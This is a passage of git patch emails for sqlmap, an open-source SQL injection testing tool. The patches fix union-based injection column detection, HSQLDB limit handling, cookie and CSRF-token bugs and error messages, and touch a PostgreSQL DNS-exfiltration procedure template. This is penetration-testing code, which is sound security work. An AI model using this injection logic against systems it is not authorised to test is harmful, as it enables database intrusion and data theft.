+105,7 @@ - + From 47a42c234e890d468814529c0ebbac6163b3b84f Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Sat, 10 Oct 2015 19:19:50 +0200 Subject: [PATCH 80/92] Fixes #1459 --- lib/core/agent.py | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/lib/core/agent.py b/lib/core/agent.py index c6827461d..e2963f01b 100644 --- a/lib/core/agent.py +++ b/lib/core/agent.py @@ -308,8 +308,8 @@ class Agent(object): for _ in set(re.findall(r"\[RANDSTR(?:\d+)?\]", payload, re.I)): payload = payload.replace(_, randomStr()) - if origValue is not None: - payload = payload.replace("[ORIGVALUE]", origValue if origValue.isdigit() else unescaper.escape("'%s'" % origValue)) + if origValue is not None and "[ORIGVALUE]" in payload: + payload = getUnicode(payload).replace("[ORIGVALUE]", origValue if origValue.isdigit() else unescaper.escape("'%s'" % origValue)) if "[INFERENCE]" in payload: if 
Backend.getIdentifiedDbms() is not None: From b9a44555fffe6b53bf5f61c387e9739ed65175eb Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Sun, 11 Oct 2015 15:20:10 +0200 Subject: [PATCH 81/92] Fixes #1462 --- lib/request/inject.py | 12 +++++++++--- 1 file changed, 9 insertions(+), 3 deletions(-) diff --git a/lib/request/inject.py b/lib/request/inject.py index 13b8984d4..ecbf65384 100644 --- a/lib/request/inject.py +++ b/lib/request/inject.py @@ -39,6 +39,7 @@ from lib.core.enums import DBMS from lib.core.enums import EXPECTED from lib.core.enums import PAYLOAD from lib.core.exception import SqlmapConnectionException +from lib.core.exception import SqlmapDataException from lib.core.exception import SqlmapNotVulnerableException from lib.core.exception import SqlmapUserQuitException from lib.core.settings import MAX_TECHNIQUES_PER_VALUE @@ -262,9 +263,14 @@ def _goInferenceProxy(expression, fromUser=False, batch=False, unpack=True, char return None try: - for num in xrange(startLimit, stopLimit): - output = _goInferenceFields(expression, expressionFields, expressionFieldsList, payload, num=num, charsetType=charsetType, firstChar=firstChar, lastChar=lastChar, dump=dump) - outputs.append(output) + try: + for num in xrange(startLimit, stopLimit): + output = _goInferenceFields(expression, expressionFields, expressionFieldsList, payload, num=num, charsetType=charsetType, firstChar=firstChar, lastChar=lastChar, dump=dump) + outputs.append(output) + except OverflowError: + errMsg = "boundary limits (%d,%d) are too large. 
Please rerun " % (startLimit, stopLimit) + errMsg += "with switch '--fresh-queries'" + raise SqlmapDataException(errMsg) except KeyboardInterrupt: print From 48619d9ae126b9057b847ff872eb3cb987ec38f8 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 12 Oct 2015 10:05:49 +0200 Subject: [PATCH 82/92] Fixes #1464 --- sqlmap.py | 9 +++++++-- 1 file changed, 7 insertions(+), 2 deletions(-) diff --git a/sqlmap.py b/sqlmap.py index d7bf52912..1fd6f47f7 100755 --- a/sqlmap.py +++ b/sqlmap.py @@ -77,7 +77,7 @@ def main(): errMsg = "your system does not properly handle non-ASCII paths. " errMsg += "Please move the sqlmap's directory to the other location" logger.error(errMsg) - exit() + raise SystemExit setPaths() @@ -122,7 +122,7 @@ def main(): except SqlmapBaseException as ex: errMsg = getSafeExString(ex) logger.critical(errMsg) - sys.exit(1) + raise SystemExit except KeyboardInterrupt: print @@ -142,6 +142,11 @@ def main(): errMsg = unhandledExceptionMessage() excMsg = traceback.format_exc() + if "No space left" in excMsg: + errMsg = "no space left on output device" + logger.error(errMsg) + raise SystemExit + for match in re.finditer(r'File "(.+?)", line', excMsg): file_ = match.group(1) file_ = os.path.relpath(file_, os.path.dirname(__file__)) From 570562369b0ba1636dc733c102340e50b053f106 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 13 Oct 2015 13:04:59 +0200 Subject: [PATCH 83/92] Further fixes for sqlmap to work properly with HSQLDB (WebGoat) --- lib/core/agent.py | 23 +++++-- lib/techniques/union/test.py | 116 ++++++++++++++++++----------------- plugins/generic/databases.py | 2 +- xml/queries.xml | 14 ++--- 4 files changed, 87 insertions(+), 68 deletions(-) diff --git a/lib/core/agent.py b/lib/core/agent.py index e2963f01b..310b46ad9 100644 --- a/lib/core/agent.py +++ b/lib/core/agent.py @@ -588,7 +588,7 @@ class Agent(object): else: return query - if Backend.getIdentifiedDbms() in (DBMS.MYSQL,): + if Backend.isDbms(DBMS.MYSQL): if fieldsExists: 
concatenatedQuery = concatenatedQuery.replace("SELECT ", "CONCAT('%s'," % kb.chars.start, 1) concatenatedQuery += ",'%s')" % kb.chars.stop @@ -615,6 +615,7 @@ class Agent(object): concatenatedQuery = concatenatedQuery.replace("SELECT ", "'%s'||" % kb.chars.start, 1) _ = unArrayizeValue(zeroDepthSearch(concatenatedQuery, " FROM ")) concatenatedQuery = "%s||'%s'%s" % (concatenatedQuery[:_], kb.chars.stop, concatenatedQuery[_:]) + concatenatedQuery = re.sub(r"('%s'\|\|)(.+)(%s)" % (kb.chars.start, re.escape(castedFields)), "\g<2>\g<1>\g<3>", concatenatedQuery) elif fieldsSelect: concatenatedQuery = concatenatedQuery.replace("SELECT ", "'%s'||" % kb.chars.start, 1) concatenatedQuery += "||'%s'" % kb.chars.stop @@ -885,15 +886,29 @@ class Agent(object): fromIndex = limitedQuery.index(" FROM ") untilFrom = limitedQuery[:fromIndex] fromFrom = limitedQuery[fromIndex + 1:] - orderBy = False + orderBy = None if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.SQLITE): limitStr = queries[Backend.getIdentifiedDbms()].limit.query % (num, 1) limitedQuery += " %s" % limitStr elif Backend.isDbms(DBMS.HSQLDB): - limitStr = queries[Backend.getIdentifiedDbms()].limit.query % (1, num) - limitedQuery += " %s" % limitStr + match = re.search(r"ORDER BY [^ ]+", limitedQuery) + if match: + limitedQuery = re.sub(r"\s*%s\s*" % match.group(0), " ", limitedQuery).strip() + limitedQuery += " %s" % match.group(0) + + if query.startswith("SELECT "): + limitStr = queries[Backend.getIdentifiedDbms()].limit.query % (num, 1) + limitedQuery = limitedQuery.replace("SELECT ", "SELECT %s " % limitStr, 1) + else: + limitStr = queries[Backend.getIdentifiedDbms()].limit.query2 % (1, num) + limitedQuery += " %s" % limitStr + + if not match: + match = re.search(r"%s\s+(\w+)" % re.escape(limitStr), limitedQuery) + if match: + orderBy = " ORDER BY %s" % match.group(1) elif Backend.isDbms(DBMS.FIREBIRD): limitStr = queries[Backend.getIdentifiedDbms()].limit.query % (num + 1, num + 1) diff --git 
a/lib/techniques/union/test.py b/lib/techniques/union/test.py index a498bf08c..1e194eefb 100644 --- a/lib/techniques/union/test.py +++ b/lib/techniques/union/test.py @@ -165,74 +165,78 @@ def _unionPosition(comment, place, parameter, prefix, suffix, count, where=PAYLO # Unbiased approach for searching appropriate usable column random.shuffle(positions) - # For each column of the table (# of NULL) perform a request using - # the UNION ALL SELECT statement to test it the target URL is - # affected by an exploitable union SQL injection vulnerability - for position in positions: - # Prepare expression with delimiters - randQuery = randomStr(UNION_MIN_RESPONSE_CHARS) - phrase = "%s%s%s".lower() % (kb.chars.start, randQuery, kb.chars.stop) - randQueryProcessed = agent.concatQuery("\'%s\'" % randQuery) - randQueryUnescaped = unescaper.escape(randQueryProcessed) + for charCount in (UNION_MIN_RESPONSE_CHARS << 2, UNION_MIN_RESPONSE_CHARS): + if vector: + break - # Forge the union SQL injection request - query = agent.forgeUnionQuery(randQueryUnescaped, position, count, comment, prefix, suffix, kb.uChar, where) - payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where) + # For each column of the table (# of NULL) perform a request using + # the UNION ALL SELECT statement to test it the target URL is + # affected by an exploitable union SQL injection vulnerability + for position in positions: + # Prepare expression with delimiters + randQuery = randomStr(charCount) + phrase = "%s%s%s".lower() % (kb.chars.start, randQuery, kb.chars.stop) + randQueryProcessed = agent.concatQuery("\'%s\'" % randQuery) + randQueryUnescaped = unescaper.escape(randQueryProcessed) - # Perform the request - page, headers = Request.queryPage(payload, place=place, content=True, raise404=False) - content = "%s%s".lower() % (removeReflectiveValues(page, payload) or "", \ - removeReflectiveValues(listToStrValue(headers.headers if headers else None), \ - payload, True) or "") 
+ # Forge the union SQL injection request + query = agent.forgeUnionQuery(randQueryUnescaped, position, count, comment, prefix, suffix, kb.uChar, where) + payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where) - if content and phrase in content: - validPayload = payload - kb.unionDuplicates = len(re.findall(phrase, content, re.I)) > 1 - vector = (position, count, comment, prefix, suffix, kb.uChar, where, kb.unionDuplicates, False) + # Perform the request + page, headers = Request.queryPage(payload, place=place, content=True, raise404=False) + content = "%s%s".lower() % (removeReflectiveValues(page, payload) or "", \ + removeReflectiveValues(listToStrValue(headers.headers if headers else None), \ + payload, True) or "") - if where == PAYLOAD.WHERE.ORIGINAL: - # Prepare expression with delimiters - randQuery2 = randomStr(UNION_MIN_RESPONSE_CHARS) - phrase2 = "%s%s%s".lower() % (kb.chars.start, randQuery2, kb.chars.stop) - randQueryProcessed2 = agent.concatQuery("\'%s\'" % randQuery2) - randQueryUnescaped2 = unescaper.escape(randQueryProcessed2) + if content and phrase in content: + validPayload = payload + kb.unionDuplicates = len(re.findall(phrase, content, re.I)) > 1 + vector = (position, count, comment, prefix, suffix, kb.uChar, where, kb.unionDuplicates, False) - # Confirm that it is a full union SQL injection - query = agent.forgeUnionQuery(randQueryUnescaped, position, count, comment, prefix, suffix, kb.uChar, where, multipleUnions=randQueryUnescaped2) - payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where) + if where == PAYLOAD.WHERE.ORIGINAL: + # Prepare expression with delimiters + randQuery2 = randomStr(charCount) + phrase2 = "%s%s%s".lower() % (kb.chars.start, randQuery2, kb.chars.stop) + randQueryProcessed2 = agent.concatQuery("\'%s\'" % randQuery2) + randQueryUnescaped2 = unescaper.escape(randQueryProcessed2) - # Perform the request - page, headers = Request.queryPage(payload, place=place, 
content=True, raise404=False) - content = "%s%s".lower() % (page or "", listToStrValue(headers.headers if headers else None) or "") - - if not all(_ in content for _ in (phrase, phrase2)): - vector = (position, count, comment, prefix, suffix, kb.uChar, where, kb.unionDuplicates, True) - elif not kb.unionDuplicates: - fromTable = " FROM (%s) AS %s" % (" UNION ".join("SELECT %d%s%s" % (_, FROM_DUMMY_TABLE.get(Backend.getIdentifiedDbms(), ""), " AS %s" % randomStr() if _ == 0 else "") for _ in xrange(LIMITED_ROWS_TEST_NUMBER)), randomStr()) - - # Check for limited row output - query = agent.forgeUnionQuery(randQueryUnescaped, position, count, comment, prefix, suffix, kb.uChar, where, fromTable=fromTable) + # Confirm that it is a full union SQL injection + query = agent.forgeUnionQuery(randQueryUnescaped, position, count, comment, prefix, suffix, kb.uChar, where, multipleUnions=randQueryUnescaped2) payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where) # Perform the request page, headers = Request.queryPage(payload, place=place, content=True, raise404=False) - content = "%s%s".lower() % (removeReflectiveValues(page, payload) or "", \ - removeReflectiveValues(listToStrValue(headers.headers if headers else None), \ - payload, True) or "") - if content.count(phrase) > 0 and content.count(phrase) < LIMITED_ROWS_TEST_NUMBER: - warnMsg = "output with limited number of rows detected. 
Switching to partial mode" - logger.warn(warnMsg) - vector = (position, count, comment, prefix, suffix, kb.uChar, PAYLOAD.WHERE.NEGATIVE, kb.unionDuplicates, False) + content = "%s%s".lower() % (page or "", listToStrValue(headers.headers if headers else None) or "") - unionErrorCase = kb.errorIsNone and wasLastResponseDBMSError() + if not all(_ in content for _ in (phrase, phrase2)): + vector = (position, count, comment, prefix, suffix, kb.uChar, where, kb.unionDuplicates, True) + elif not kb.unionDuplicates: + fromTable = " FROM (%s) AS %s" % (" UNION ".join("SELECT %d%s%s" % (_, FROM_DUMMY_TABLE.get(Backend.getIdentifiedDbms(), ""), " AS %s" % randomStr() if _ == 0 else "") for _ in xrange(LIMITED_ROWS_TEST_NUMBER)), randomStr()) - if unionErrorCase and count > 1: - warnMsg = "combined UNION/error-based SQL injection case found on " - warnMsg += "column %d. sqlmap will try to find another " % (position + 1) - warnMsg += "column with better characteristics" - logger.warn(warnMsg) - else: - break + # Check for limited row output + query = agent.forgeUnionQuery(randQueryUnescaped, position, count, comment, prefix, suffix, kb.uChar, where, fromTable=fromTable) + payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where) + + # Perform the request + page, headers = Request.queryPage(payload, place=place, content=True, raise404=False) + content = "%s%s".lower() % (removeReflectiveValues(page, payload) or "", \ + removeReflectiveValues(listToStrValue(headers.headers if headers else None), \ + payload, True) or "") + if content.count(phrase) > 0 and content.count(phrase) < LIMITED_ROWS_TEST_NUMBER: + warnMsg = "output with limited number of rows detected. 
Switching to partial mode" + logger.warn(warnMsg) + vector = (position, count, comment, prefix, suffix, kb.uChar, PAYLOAD.WHERE.NEGATIVE, kb.unionDuplicates, False) + + unionErrorCase = kb.errorIsNone and wasLastResponseDBMSError() + + if unionErrorCase and count > 1: + warnMsg = "combined UNION/error-based SQL injection case found on " + warnMsg += "column %d. sqlmap will try to find another " % (position + 1) + warnMsg += "column with better characteristics" + logger.warn(warnMsg) + else: + break return validPayload, vector diff --git a/plugins/generic/databases.py b/plugins/generic/databases.py index ed3ac32eb..8070fc0ad 100644 --- a/plugins/generic/databases.py +++ b/plugins/generic/databases.py @@ -415,7 +415,7 @@ class Databases: colList = filter(None, colList) if conf.tbl: - if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): + if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.HSQLDB): conf.tbl = conf.tbl.upper() tblList = conf.tbl.split(",") diff --git a/xml/queries.xml b/xml/queries.xml index c57a5b49f..98b79cac7 100644 --- a/xml/queries.xml +++ b/xml/queries.xml @@ -651,8 +651,8 @@ - - + + @@ -676,26 +676,26 @@ - + - + - + - + - + From c4df6f3a22a4a0d68d5b0778dc849a9a01e44248 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 13 Oct 2015 13:31:28 +0200 Subject: [PATCH 84/92] Fixes #1465 --- lib/request/connect.py | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/lib/request/connect.py b/lib/request/connect.py index b5f222882..4cb24888e 100644 --- a/lib/request/connect.py +++ b/lib/request/connect.py @@ -439,6 +439,11 @@ class Connect(object): logger.log(CUSTOM_LOGGING.TRAFFIC_OUT, requestMsg) + if conf.cj: + for cookie in conf.cj: + if cookie.value is None: + cookie.value = "" + conn = urllib2.urlopen(req) if not kb.authHeader and getRequestHeader(req, HTTP_HEADER.AUTHORIZATION) and (conf.authType or "").lower() == AUTH_TYPE.BASIC.lower(): From 80aca35dd13f96751caf6998c8389db9c3334f52 Mon Sep 17 00:00:00 2001 From: 
Miroslav Stampar Date: Tue, 13 Oct 2015 15:00:59 +0200 Subject: [PATCH 85/92] Removing #1450 --- lib/core/settings.py | 49 -------------------------------------------- lib/parse/cmdline.py | 6 ------ 2 files changed, 55 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 3b53705ba..4ded4236a 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -682,52 +682,3 @@ th{ font-size:10px; } """ - -NNC5ED_LOGO = """ -MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM -MMWWMMMWWMMMWWMMMMWWMMMMWWMMMWWMMMMMWMMMWWWMMMMMMMWWMMMWWMWMWWWWMMMWWWMMMWMWWWMMMMMWWMMMMM -MMNNNMMNNMMWXNNMMMWNWMMWNWMMNNNWMMMNNWMWNNNMMMMMMWNNWMMNNWNWWWWWMNNWWNNNWNNWWWNWMMNNNNMMMM -MMWWWNWNXMMNNWNNMMMNNMWNWMMWXWNXWMMNXWMNNWNNMMMMMWNWNNWXNWNWWNWWNNWMMMWWWNNWWNNWMWXWNXWMMM -MMNNMWNNNMNNNNNXWMMMNNNNMMWNNNNXNMMNNWWNNNNXWMMMMWXWMNNNNWNWMMMMWNWMWWNNWNNWWWWMWNNNNXNMMM -MMNNMMWNNWNWMMMNNWMMWWNMMMNNMMMWNNWNWWNNMMMNNWMMMWNWMMNNWWNWWNNWMWNWWNNWMWWMMMWWNNWMMWNNMM -MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM -MMMMMMMMMMMMMMMMMMMMMNXXXXXXXXXXXXXXNMMMMMMMMMMMMMMMMMMWXXXXXXXXXXXXXXNMMMMMMMMMMMMMMMMMMM -MMMMMMMMMMMMMMMMMMMM00:,'',,;'...';cld0XXWMMMMMMMMWXXKxlc;'...';,,'',:O0MMMMMMMMMMMMMMMMMM -MMMMMMMMMMMMMMMMMMMNK,       .,;:.     .:kKXXXXXXKkc.     .:;,.       .XXMMMMMMMMMMMMMMMMM -MMMMMMMMMMMMMMMMMMM0W            ;d.      'c;,,;:,      .d;            N0MMMMMMMMMMMMMMMMM -MMMMMMMMMMMMMMMMMMM0W              K;                  'K.         .odoX0MMMMMMMMMMMMMMMMM -MMMMMMMMMMMMMMMMMMM0W            :l.          '         .cc        OOX00MMMMMMMMMMMMMMMMMM -MMMMMMMMMMMMMMMMMMMKX.         ':             .;           ;,       :lcN0MMMMMMMMMMMMMMMMM -MMMMMMMMMMMMMMMMMMMM0l        ;.               l             ;        ;0WMMMMMMMMMMMMMMMMM -MMMMMMMMMMMMMMMMMMMM0X       .                 l              .       
O0MMMMMMMMMMMMMMMMMM -MMMMMMMMMMMWXXXXXMMMW0d                        :                     cKNMMMXXXXXXWMMMMMMMM -MMMMMMMMMMXKl. .dKNMMNKo      .'::             '          ;:,.      lKXMMN0d.  .:KKMMMMMMM -MMMMMMMMMM0:     dxkO0OKK;  ,KMMMN    ,ko.     .   lO:    0MMMXc  ,0X00OOxO      ;KXMMMMMM -MMMMMMMMMKX.             :  kMMMMM.  oMMMWo      cWMMMO   WMMMMK  c               :0WMMMMM -MMMMMMMMM0K             .'   kMMMMx .MMMMMM0    kMMMMMM: lMMMM0.  .'              ;0WMMMMM -MMMMMMMMMXK:   ;0XXXXXXKN.    'kWMMl:MMMMMMMd  cMMMMMMMo;MMMO,     XKXXXXXXXOo,.,o0XMMMMMM -MMMMMMMMMMNXX0XXNMMMMMMM0O       ,ldlkO0OOxl.   cxOO0OOodl,       k0WMMMMMMMMXXXXXMMMMMMMM -MMMMMMMMMMMMMMMMMMMMMMMMWO0                                      k0KWMMMMMMMMMMMMMMMMMMMMM -MMMMMMMMMMMMNKOooxKXXXXkoc,,.                ..                .;.,ldOXXXNMNXXXWMMMMMMMMMM -MMMMMMMMMMMWOd     :;.      .c.            oNMMWx            .o,       .;ldd:;ckKNMMMMMMMM -MMMMMMMMMMMW0:           .:d0XXOl'        'WKMMKN;        'lkXXXOo;.            l0WMMMMMMM -MMMMMMMMMMMMOx       .:d0XXWMMXXk0OO:.       0X.      .,kO0OKXMMMNXXOo;         .KXMMMMMMM -MMMMMMMMMMMM0o      ;XXNMMMMWK00kNOk0Xkx,          'dxKKkONkO0KNMMMMMNKN.       O0MMMMMMMM -MMMMMMMMMMMMXKd.  .lKXMMMMMMO0Kk0xKxXkKXX0Oo,..,lkOXX000xKxKkKO0WMMMMMM00.     
d0MMMMMMMMM -MMMMMMMMMMMMMMXXXXXXWMMMMMM0W000WO00XK0NKk;;cll:,,xKN0N0000X0OKX0MMMMMMMXXxlloOKWMMMMMMMMM -MMMMMMMMMMMMMMMMMMMMMMMMMMM0WX0NK0KXKX00l;NdlollXN.x0KXKXK0KX0WX0MMMMMMMMMMNXNMMMMMMMMMMMM -MMMMMMMMMMMMMMMMMMMMMMMMMMMWXXNMNXXNMN0d ;,.ccc;.c'.k0MMWKXXMWXXNMMMMMMMMMMMMMMMMMMMMMMMMM -MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM0N  kKKKOOKKK: 'KXMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM -MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM0N  WMMlNKOMMx 'KXMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM -MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM0N  WMMdX0OMMx 'KXMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM -MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM0N  k00000000: 'KXMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM -MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMN0d::::::::::::k0MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM -MMMMMMMW00OOXMMMMMMMMMMMMMMMMMMMMMMMMMMXXXXXXXXXXXXXNMMMMMMMMMMN00O0WMMMMMMMMMMMMMMMMMMMMM -MMMMMMd;KMMK,:XMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMKlKMMMMMMMMMMXclNMWd,dMMMMMMMMMMMMMMMMMMMM -MMMMMO';NMMMxo0No:lccOM0oxdc:lNWd::;:xWNdk00loNl,';:NOc::;:kM:'oMMMXodW0c:l:oXMdokl:ckMMMM -MMMMMk''KMMNdxKo';WN''kk'dXK,'0o',dc''kl'0MMKkXK''KNMklldc',W;':MMM0xxX''xMx',W:,0Xd';MMMM -MMMMMWl,WMMW';XO,,K0',0k'dMN''K0cckx',Kk'0MMo,K0''kcd''ck,',WK;oMMMk'dWc'oXo':W:'XMx':MMMM -MMMMMMMXOO0KKWMMNOxxONMXOXMWkxNMKkxxONMMX0KK0NMM0xxOW0xxO0kOWMMKOO00NMMMKkxkKMMOOWMXxOMMMM -MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM - -""" \ No newline at end of file diff --git a/lib/parse/cmdline.py b/lib/parse/cmdline.py index 5c0dc16d7..68bad2f3f 100644 --- a/lib/parse/cmdline.py +++ b/lib/parse/cmdline.py @@ -17,7 +17,6 @@ from optparse import SUPPRESS_HELP from lib.core.common import checkDeprecatedOptions from lib.core.common import checkSystemEncoding -from lib.core.common import dataToStdout from lib.core.common import expandMnemonics from lib.core.common import getUnicode from lib.core.data import cmdLineOptions @@ -31,7 +30,6 @@ from lib.core.settings import BASIC_HELP_ITEMS from lib.core.settings import DUMMY_URL from 
lib.core.settings import IS_WIN from lib.core.settings import MAX_HELP_OPTION_LENGTH -from lib.core.settings import NNC5ED_LOGO from lib.core.settings import VERSION_STRING from lib.core.shell import autoCompletion from lib.core.shell import clearHistory @@ -930,10 +928,6 @@ def cmdLineParser(argv=None): if argv[i] == "-z": expandMnemonics(argv[i + 1], parser, args) - if args.nnc5ed: - dataToStdout(NNC5ED_LOGO) - raise SystemExit - if args.dummy: args.url = args.url or DUMMY_URL From e3ae026077e4e94b0b2d1d6456ac4581a7964bbe Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 14 Oct 2015 15:19:44 +0200 Subject: [PATCH 86/92] Fixes #1467 --- lib/request/connect.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/request/connect.py b/lib/request/connect.py index 4cb24888e..b57ca6933 100644 --- a/lib/request/connect.py +++ b/lib/request/connect.py @@ -849,7 +849,7 @@ class Connect(object): if headers and "text/plain" in headers.get(HTTP_HEADER.CONTENT_TYPE, ""): token = page - if not token and any(_.name == conf.csrfToken for _ in conf.cj): + if not token and conf.cj and any(_.name == conf.csrfToken for _ in conf.cj): for _ in conf.cj: if _.name == conf.csrfToken: token = _.value From 475ca5277a50f4f1a787c83f5bdb11cd7767e732 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 14 Oct 2015 16:11:11 +0200 Subject: [PATCH 87/92] Minor information update regarding #541 --- lib/core/update.py | 9 +++++++-- 1 file changed, 7 insertions(+), 2 deletions(-) diff --git a/lib/core/update.py b/lib/core/update.py index f2a8de322..7e0b802a7 100644 --- a/lib/core/update.py +++ b/lib/core/update.py @@ -30,7 +30,7 @@ def update(): if not os.path.exists(os.path.join(rootDir, ".git")): errMsg = "not a git repository. Please checkout the 'sqlmapproject/sqlmap' repository " - errMsg += "from GitHub (e.g. git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev)" + errMsg += "from GitHub (e.g. 
'git clone https://github.com/sqlmapproject/sqlmap.git sqlmap')" logger.error(errMsg) else: infoMsg = "updating sqlmap to the latest development version from the " @@ -51,7 +51,12 @@ def update(): _ = lib.core.settings.REVISION = getRevisionNumber() logger.info("%s the latest revision '%s'" % ("already at" if "Already" in stdout else "updated to", _)) else: - logger.error("update could not be completed ('%s')" % re.sub(r"\W+", " ", stderr).strip()) + if "Not a git repository" in stderr: + errMsg = "not a valid git repository. Please checkout the 'sqlmapproject/sqlmap' repository " + errMsg += "from GitHub (e.g. 'git clone https://github.com/sqlmapproject/sqlmap.git sqlmap')" + logger.error(errMsg) + else: + logger.error("update could not be completed ('%s')" % re.sub(r"\W+", " ", stderr).strip()) if not success: if IS_WIN: From 956047b43fcd9dd1a6b8569892653c93e25ba93e Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 15 Oct 2015 13:07:43 +0200 Subject: [PATCH 88/92] Patch for an Issue #1468 --- lib/request/redirecthandler.py | 3 +++ 1 file changed, 3 insertions(+) diff --git a/lib/request/redirecthandler.py b/lib/request/redirecthandler.py index 73fa73f19..3359f59e7 100644 --- a/lib/request/redirecthandler.py +++ b/lib/request/redirecthandler.py @@ -30,6 +30,7 @@ from lib.core.settings import MAX_SINGLE_URL_REDIRECTIONS from lib.core.settings import MAX_TOTAL_REDIRECTIONS from lib.core.threads import getCurrentThreadData from lib.request.basic import decodePage +from lib.request.basic import parseResponse class SmartRedirectHandler(urllib2.HTTPRedirectHandler): def _get_header_redirect(self, headers): @@ -118,6 +119,8 @@ class SmartRedirectHandler(urllib2.HTTPRedirectHandler): result = fp if redurl and kb.redirectChoice == REDIRECTION.YES: + parseResponse(content, headers) + req.headers[HTTP_HEADER.HOST] = getHostHeader(redurl) if headers and HTTP_HEADER.SET_COOKIE in headers: req.headers[HTTP_HEADER.COOKIE] = 
headers[HTTP_HEADER.SET_COOKIE].split(conf.cookieDel or DEFAULT_COOKIE_DELIMITER)[0] From f793a26095832e3e26ced344aa616ed32bac062c Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 15 Oct 2015 16:00:59 +0200 Subject: [PATCH 89/92] Removing ugly duplicating of \ (hidden bugs came - e.g. DNS exfiltration) --- lib/core/agent.py | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/lib/core/agent.py b/lib/core/agent.py index 310b46ad9..67222ccc2 100644 --- a/lib/core/agent.py +++ b/lib/core/agent.py @@ -187,12 +187,12 @@ class Agent(object): if origValue: regex = r"(\A|\b)%s=%s%s" % (re.escape(parameter), re.escape(origValue), r"(\Z|\b)" if origValue[-1].isalnum() else "") - retVal = _(regex, "%s=%s" % (parameter, self.addPayloadDelimiters(newValue.replace("\\", "\\\\"))), paramString) + retVal = _(regex, "%s=%s" % (parameter, self.addPayloadDelimiters(newValue)), paramString) else: - retVal = _(r"(\A|\b)%s=%s(\Z|%s|%s|\s)" % (re.escape(parameter), re.escape(origValue), DEFAULT_GET_POST_DELIMITER, DEFAULT_COOKIE_DELIMITER), "%s=%s\g<2>" % (parameter, self.addPayloadDelimiters(newValue.replace("\\", "\\\\"))), paramString) + retVal = _(r"(\A|\b)%s=%s(\Z|%s|%s|\s)" % (re.escape(parameter), re.escape(origValue), DEFAULT_GET_POST_DELIMITER, DEFAULT_COOKIE_DELIMITER), "%s=%s\g<2>" % (parameter, self.addPayloadDelimiters(newValue)), paramString) if retVal == paramString and urlencode(parameter) != parameter: - retVal = _(r"(\A|\b)%s=%s" % (re.escape(urlencode(parameter)), re.escape(origValue)), "%s=%s" % (urlencode(parameter), self.addPayloadDelimiters(newValue.replace("\\", "\\\\"))), paramString) + retVal = _(r"(\A|\b)%s=%s" % (re.escape(urlencode(parameter)), re.escape(origValue)), "%s=%s" % (urlencode(parameter), self.addPayloadDelimiters(newValue)), paramString) if retVal: retVal = retVal.replace(BOUNDARY_BACKSLASH_MARKER, '\\') From 20559fd52c1040cc9dcbcd96898f7ccfea3aea7c Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 15 Oct 2015 
16:01:09 +0200 Subject: [PATCH 90/92] Minor patch --- procs/postgresql/dns_request.sql | 1 + 1 file changed, 1 insertion(+) diff --git a/procs/postgresql/dns_request.sql b/procs/postgresql/dns_request.sql index dd04d8663..653395cbe 100644 --- a/procs/postgresql/dns_request.sql +++ b/procs/postgresql/dns_request.sql @@ -1,4 +1,5 @@ DROP TABLE IF EXISTS %RANDSTR1%; +CREATE LANGUAGE plpgsql; CREATE TABLE %RANDSTR1%(%RANDSTR2% text); CREATE OR REPLACE FUNCTION %RANDSTR3%() RETURNS VOID AS $$ From c51de99a25dbb8356cd36501c85881b4282e2d1d Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 15 Oct 2015 16:38:48 +0200 Subject: [PATCH 91/92] Minor revert --- procs/postgresql/dns_request.sql | 1 - 1 file changed, 1 deletion(-) diff --git a/procs/postgresql/dns_request.sql b/procs/postgresql/dns_request.sql index 653395cbe..dd04d8663 100644 --- a/procs/postgresql/dns_request.sql +++ b/procs/postgresql/dns_request.sql @@ -1,5 +1,4 @@ DROP TABLE IF EXISTS %RANDSTR1%; -CREATE LANGUAGE plpgsql; CREATE TABLE 